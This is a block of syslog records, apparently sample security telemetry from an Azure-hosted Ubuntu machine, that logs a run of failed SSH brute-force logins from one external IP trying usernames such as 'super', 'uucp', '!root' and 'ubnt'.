+1974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:09,UbuntuDevEnv,2019-06-28 05:06:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:11,UbuntuDevEnv,2019-06-28 05:06:10,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 25108 ssh2,91050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,25108,,
+1976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:14,UbuntuDevEnv,2019-06-28 05:06:14,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:14,UbuntuDevEnv,2019-06-28 05:06:14,auth,UbuntuDevEnv,info,"Disconnecting invalid user user 193.201.224.232 port 25108: Change of username or service not allowed: (user,ssh-connection) -> (uucp,ssh-connection) [preauth]",91050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,25108,,
+1978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:15,UbuntuDevEnv,2019-06-28 05:06:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=uucp,91082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uucp,193.201.224.2,,0,
+1979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:17,UbuntuDevEnv,2019-06-28 05:06:17,auth,UbuntuDevEnv,info,Failed password for uucp from 193.201.224.232 port 3758 ssh2,91082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,3758,,
+1980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:20,UbuntuDevEnv,2019-06-28 05:06:20,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=uucp,91082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uucp,193.201.224.2,,0,
+1981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:20,UbuntuDevEnv,2019-06-28 05:06:19,auth,UbuntuDevEnv,info,Failed password for uucp from 193.201.224.232 port 3758 ssh2,91082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,3758,,
+1982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:20,UbuntuDevEnv,2019-06-28 05:06:20,auth,UbuntuDevEnv,info,"Disconnecting authenticating user uucp 193.201.224.232 port 3758: Change of username or service not allowed: (uucp,ssh-connection) -> (,ssh-connection) [preauth]",91082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,uucp,193.201.224.2,3758,,
+1983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:23,UbuntuDevEnv,2019-06-28 05:06:23,auth,UbuntuDevEnv,info,Invalid user  from 193.201.224.232 port 10863,91109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,10863,,
+1984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:23,UbuntuDevEnv,2019-06-28 05:06:23,auth,UbuntuDevEnv,info,Failed none for invalid user  from 193.201.224.232 port 10863 ssh2,91109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,10863,,
+1985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:26,UbuntuDevEnv,2019-06-28 05:06:25,auth,UbuntuDevEnv,info,"Disconnecting invalid user  193.201.224.232 port 10863: Change of username or service not allowed: (,ssh-connection) -> (super,ssh-connection) [preauth]",91109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,10863,,
+1986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:30,UbuntuDevEnv,2019-06-28 05:06:30,auth,UbuntuDevEnv,info,Invalid user super from 193.201.224.232 port 46129,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,46129,,
+1987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:30,UbuntuDevEnv,2019-06-28 05:06:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:30,UbuntuDevEnv,2019-06-28 05:06:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:32,UbuntuDevEnv,2019-06-28 05:06:31,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 46129 ssh2,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,46129,,
+1990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:32,UbuntuDevEnv,2019-06-28 05:06:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:33,UbuntuDevEnv,2019-06-28 05:06:33,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 46129 ssh2,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,46129,,
+1992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:36,UbuntuDevEnv,2019-06-28 05:06:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:38,UbuntuDevEnv,2019-06-28 05:06:37,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 46129 ssh2,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,46129,,
+1994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:39,UbuntuDevEnv,2019-06-28 05:06:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:41,UbuntuDevEnv,2019-06-28 05:06:40,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 46129 ssh2,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,46129,,
+1996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:41,UbuntuDevEnv,2019-06-28 05:06:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:43,UbuntuDevEnv,2019-06-28 05:06:42,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 46129 ssh2,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,46129,,
+1998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:43,UbuntuDevEnv,2019-06-28 05:06:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:44,UbuntuDevEnv,2019-06-28 05:06:44,auth,UbuntuDevEnv,info,Disconnecting invalid user super 193.201.224.232 port 46129: Too many authentication failures [preauth],91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,46129,,
+2000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:44,UbuntuDevEnv,2019-06-28 05:06:44,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user super from 193.201.224.232 port 46129 ssh2 [preauth],91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,46129,,
+2001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:44,UbuntuDevEnv,2019-06-28 05:06:44,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:44,UbuntuDevEnv,2019-06-28 05:06:44,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 46129 ssh2,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,46129,,
+2003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:44,UbuntuDevEnv,2019-06-28 05:06:44,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:47,UbuntuDevEnv,2019-06-28 05:06:47,auth,UbuntuDevEnv,info,Invalid user super from 193.201.224.232 port 33284,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,33284,,
+2005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:47,UbuntuDevEnv,2019-06-28 05:06:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:47,UbuntuDevEnv,2019-06-28 05:06:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:50,UbuntuDevEnv,2019-06-28 05:06:49,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 33284 ssh2,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,33284,,
+2008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:51,UbuntuDevEnv,2019-06-28 05:06:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:53,UbuntuDevEnv,2019-06-28 05:06:53,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 33284 ssh2,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,33284,,
+2010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:53,UbuntuDevEnv,2019-06-28 05:06:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:55,UbuntuDevEnv,2019-06-28 05:06:55,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 33284 ssh2,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,33284,,
+2012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:56,UbuntuDevEnv,2019-06-28 05:06:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:58,UbuntuDevEnv,2019-06-28 05:06:57,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 33284 ssh2,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,33284,,
+2014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:00,UbuntuDevEnv,2019-06-28 05:07:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:03,UbuntuDevEnv,2019-06-28 05:07:02,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 33284 ssh2,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,33284,,
+2016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:03,UbuntuDevEnv,2019-06-28 05:07:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:05,UbuntuDevEnv,2019-06-28 05:07:04,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 33284 ssh2,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,33284,,
+2018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:05,UbuntuDevEnv,2019-06-28 05:07:04,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:05,UbuntuDevEnv,2019-06-28 05:07:04,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user super from 193.201.224.232 port 33284 ssh2 [preauth],91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,33284,,
+2020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:05,UbuntuDevEnv,2019-06-28 05:07:04,auth,UbuntuDevEnv,info,Disconnecting invalid user super 193.201.224.232 port 33284: Too many authentication failures [preauth],91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,33284,,
+2021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:05,UbuntuDevEnv,2019-06-28 05:07:04,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:09,UbuntuDevEnv,2019-06-28 05:07:08,auth,UbuntuDevEnv,info,Invalid user super from 193.201.224.232 port 26303,91277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,26303,,
+2023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:09,UbuntuDevEnv,2019-06-28 05:07:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:09,UbuntuDevEnv,2019-06-28 05:07:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:11,UbuntuDevEnv,2019-06-28 05:07:10,auth,UbuntuDevEnv,info,Failed password for invalid user super from 193.201.224.232 port 26303 ssh2,91277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,26303,,
+2026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:11,UbuntuDevEnv,2019-06-28 05:07:10,auth,UbuntuDevEnv,info,"Disconnecting invalid user super 193.201.224.232 port 26303: Change of username or service not allowed: (super,ssh-connection) -> (!root,ssh-connection) [preauth]",91277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,193.201.224.2,26303,,
+2027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:12,UbuntuDevEnv,2019-06-28 05:07:11,auth,UbuntuDevEnv,info,Invalid user !root from 193.201.224.232 port 58470,91294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,58470,,
+2028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:12,UbuntuDevEnv,2019-06-28 05:07:11,auth,UbuntuDevEnv,info,Failed none for invalid user !root from 193.201.224.232 port 58470 ssh2,91294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,58470,,
+2029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:12,UbuntuDevEnv,2019-06-28 05:07:11,auth,UbuntuDevEnv,info,"Disconnecting invalid user !root 193.201.224.232 port 58470: Change of username or service not allowed: (!root,ssh-connection) -> (ubnt,ssh-connection) [preauth]",91294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,58470,,
+2030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:12,UbuntuDevEnv,2019-06-28 05:07:12,auth,UbuntuDevEnv,info,Invalid user ubnt from 193.201.224.232 port 59417,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,59417,,
+2031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:12,UbuntuDevEnv,2019-06-28 05:07:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:12,UbuntuDevEnv,2019-06-28 05:07:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:14,UbuntuDevEnv,2019-06-28 05:07:13,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 59417 ssh2,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,59417,,
